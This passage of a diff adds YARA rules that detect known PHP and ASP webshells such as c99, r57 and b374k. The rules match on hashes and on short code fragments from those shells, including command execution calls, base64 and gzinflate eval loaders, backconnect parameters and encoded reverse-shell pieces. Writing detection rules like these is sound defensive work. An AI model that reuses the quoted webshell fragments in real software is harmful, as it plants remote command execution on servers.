+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+	strings:
+		$s0 = "'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash'," fullword
+		$s1 = "$name='ec371748dc2da624b35a4f8f685dd122'"
+		$s2 = "rst.void.ru" 
+	condition:
+		3 of them
+}
+rule _r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "8023394542cddf8aee5dec6072ed02b5"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo ws(2).$lb.\" <a"
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"
+		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"
+	condition:
+		2 of them
+}
+rule _wacking_php_php_1_SpecialShell_99_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "if(eregi(\"./shbd $por\",$scan))"
+		$s1 = "$_POST['backconnectip']"
+		$s2 = "$_POST['backcconnmsg']" 
+	condition:
+		1 of them
+}
+rule _r577_php_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "8023394542cddf8aee5dec6072ed02b5"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s1 = "if(rmdir($_POST['mk_name']))"
+		$s2 = "$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>"
+		$s3 = "if(unlink($_POST['mk_name'])) echo \"<table width=100% cellpadding=0 cell"
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mvi"
+		$s1 = "echo \"<b>Execute file:</b><form action=\\\"\".$surl.\"\\\" method=POST><inpu"
+		$s2 = "\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswd"
+	condition:
+		1 of them
+}
+rule _webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php {
+	meta:
+		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
+		hash1 = "12911b73bc6a5d313b494102abcf5c57"
+		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s0 = "return $type . $owner . $group . $other;" fullword
+		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells {
+	meta:
+		description = "Semi-Auto-generated  - from files multiple_php_webshells"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "be0f67f3e995517d18859ed57b4b4389"
+		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash4 = "8023394542cddf8aee5dec6072ed02b5"
+		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash6 = "817671e1bdc85e04cc3440bbd9288800"
+		hash7 = "7101fe72421402029e2629f3aaed6de7"
+		hash8 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s2 = "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0"
+		$s4 = "A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+	strings:
+		$s0 = "<b>Dumped! Dump has been writed to "
+		$s1 = "if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<TABLE st"
+		$s2 = "<input type=submit name=actarcbuff value=\\\"Pack buffer to archive"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+	strings:
+		$s0 = "@ini_set(\"highlight" fullword
+		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
+		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+	condition:
+		2 of them
+}
+rule _GFS_web_shell_ver_3_1_7___PRiV8_php_nshell_php_php_gfs_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "be0f67f3e995517d18859ed57b4b4389"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+	strings:
+		$s2 = "echo $uname.\"</font><br><b>\";" fullword
+		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
+		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "c99ftpbrutecheck"
+		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
+		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
+		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sqlquicklaunch[] = array(\""
+		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+	condition:
+		all of them
+}
+rule _antichat_php_php_Fatalshell_php_php_a_gedit_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
+		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
+		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+	strings:
+		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
+		$s1 = "if($action==\"phpeval\"){" fullword
+		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
+		$s3 = "$dir=getcwd().\"/\";" fullword
+	condition:
+		2 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+	strings:
+		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+	condition:
+		1 of them
+}
+rule _Crystal_php_nshell_php_php_load_shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
+		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
+		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+	strings:
+		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+		$s1 = "$dires = $dires . $directory;" fullword
+		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+	condition:
+		2 of them
+}
+rule _nst_php_php_cybershell_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "ef8828e0bc0641a655de3932199c0527"
+		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash3 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "@$rto=$_POST['rto'];" fullword
+		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
+		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+	condition:
+		2 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "433706fdc539238803fd47c4394b5109"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
+		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+	condition:
+		all of them
+}
+rule _c99shell_v1_0_php_php_c99php_1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash3 = "d089e7168373a0634e1ac18c0ee00085"
+		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+	condition:
+		all of them
+}
+rule multiple_php_webshells_2 {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash6 = "09609851caa129e40b0d56e90dfc476c"
+		hash7 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
+		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
+		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
+		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
+		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
+		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+	condition:
+		2 of them
+}
+rule _r577_php_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
+		$s2 = "'eng_text30'=>'Cat file'," fullword
+		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+	condition:
+		1 of them
+}
+rule _nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
+		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash3 = "f3ca29b7999643507081caab926e2e74"
+	strings:
+		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
+		$s1 = "$ret = posix_kill($pid,$sig);" fullword
+		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
+		$s3 = "$i = $nixpasswd;" fullword
+	condition:
+		2 of them
+}
+
+/* GIF Header webshell */
+
+rule DarkSecurityTeam_Webshell {
+	meta:
+		description = "Dark Security Team Webshell"
+		author = "Florian Roth"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		score = 50
+	strings:
+		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+	condition:
+		1 of them
+}
+
+rule GIFCloaked_Webshell {
+	meta:
+		description = "Looks like a webshell cloaked as GIF"
+		author = "Florian Roth"
+		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
+		score = 50
+	strings:
+		$magic = { 47 49 46 38 } /* GIF8 ... */
+		$s0 = "input type"		
+		$s1 = "<%eval request"
+		$s2 = "<%eval(Request.Item["
+		$s3 = "LANGUAGE='VBScript'"
+	condition:
+		( $magic at 0 ) and ( 1 of ($s*) )
+}
+
+rule PHP_Cloaked_Webshell_SuperFetchExec {
+	meta:
+		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		reference = "http://goo.gl/xFvioC"
+		author = "Florian Roth"
+		score = 50
+	strings:
+		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"		
+	condition:
+		$s0
+}
+
+/* PHP Webshell Update - August 2014 - deducted from https://github.com/JohnTroony/php-webshells */
+
+rule WebShell_RemExp_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		author = "Florian Roth"
+		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
+	strings:
+		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
+		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
+		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
+		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+	condition:
+		all of them
+}
+rule WebShell_dC3_Security_Crew_Shell_PRiV {
+	meta:
+		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		author = "Florian Roth"
+		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
+	strings:
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
+		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
+		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
+		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+	condition:
+		3 of them
+}
+rule WebShell_simattacker {
+	meta:
+		description = "PHP Webshells Github Archive - file simattacker.php"
+		author = "Florian Roth"
+		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
+	strings:
+		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
+		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
+		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
+		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
+		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s20 = "$Comments=$_POST['Comments'];" fullword
+	condition:
+		2 of them
+}
+rule WebShell_DTool_Pro {
+	meta:
+		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		author = "Florian Roth"
+		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
+	strings:
+		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
+		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
+		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
+		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
+		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
+		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
+		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
+		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+	condition:
+		3 of them
+}
+rule WebShell_ironshell {
+	meta:
+		description = "PHP Webshells Github Archive - file ironshell.php"
+		author = "Florian Roth"
+		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
+	strings:
+		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
+		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
+		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
+		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
+		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
+		$s16 = "if($_POST['chars'] == \"9999\")" fullword
+		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
+		$s18 = "print shell_exec($command);" fullword
+	condition:
+		3 of them
+}
+rule WebShell_indexer_asp_php {
+	meta:
+		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		author = "Florian Roth"
+		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
+	strings:
+		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
+		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
+		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
+		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
+		$s7 = "var message=\"SaNaLTeRoR - " fullword
+		$s8 = "nDexEr - Reader\"" fullword
+	condition:
+		3 of them
+}
+rule WebShell_toolaspshell {
+	meta:
+		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		author = "Florian Roth"
+		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
+	strings:
+		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
+		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
+		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_mini_shell_php_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		author = "Florian Roth"
+		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
+	strings:
+		$s0 = "@error_reporting(0);" fullword
+		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
+		$s3 = "@set_time_limit(0); " fullword
+	condition:
+		all of them
+}
+rule WebShell_Sincap_1_0 {
+	meta:
+		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		author = "Florian Roth"
+		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"
+	strings:
+		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword
+		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword
+		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword
+		$s12 = "while (($ekinci=readdir ($sedat))){" fullword
+		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword
+	condition:
+		2 of them
+}
+rule WebShell_b374k_php {
+	meta:
+		description = "PHP Webshells Github Archive - file b374k.php.php"
+		author = "Florian Roth"
+		hash = "04c99efd187cf29dc4e5603c51be44170987bce2"
+	strings:
+		$s0 = "// encrypt your password to md5 here http://kerinci.net/?x=decode" fullword
+		$s6 = "// password (default is: b374k)"
+		$s8 = "//******************************************************************************"
+		$s9 = "// b374k 2.2" fullword
+		$s10 = "eval(\"?>\".gzinflate(base64_decode("
+	condition:
+		3 of them
+}
+rule WebShell_SimAttacker___Vrsion_1_0_0___priv8_4_My_friend {
+	meta:
+		description = "PHP Webshells Github Archive - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+	strings:
+		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s19 = "$Comments=$_POST['Comments'];" fullword
+		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
+	condition:
+		3 of them
+}
+rule WebShell_h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+	strings:
+		$s11 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+		$s13 = "$cmd = $_POST['cmd'];" fullword
+		$s16 = "$uname = posix_uname( );" fullword
+		$s17 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+		$s18 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
+		$s20 = "ob_end_clean();" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_MyShell {
+	meta:
+		description = "PHP Webshells Github Archive - file MyShell.php"
+		author = "Florian Roth"
+		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+	strings:
+		$s3 = "<title>MyShell error - Access Denied</title>" fullword
+		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+		$s19 = "#every command you excecute." fullword
+		$s20 = "<form name=\"shell\" method=\"post\">" fullword
+	condition:
+		3 of them
+}
+rule WebShell_php_webshells_pws {
+	meta:
+		description = "PHP Webshells Github Archive - file pws.php"
+		author = "Florian Roth"
+		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+	strings:
+		$s6 = "if ($_POST['cmd']){" fullword
+		$s7 = "$cmd = $_POST['cmd'];" fullword
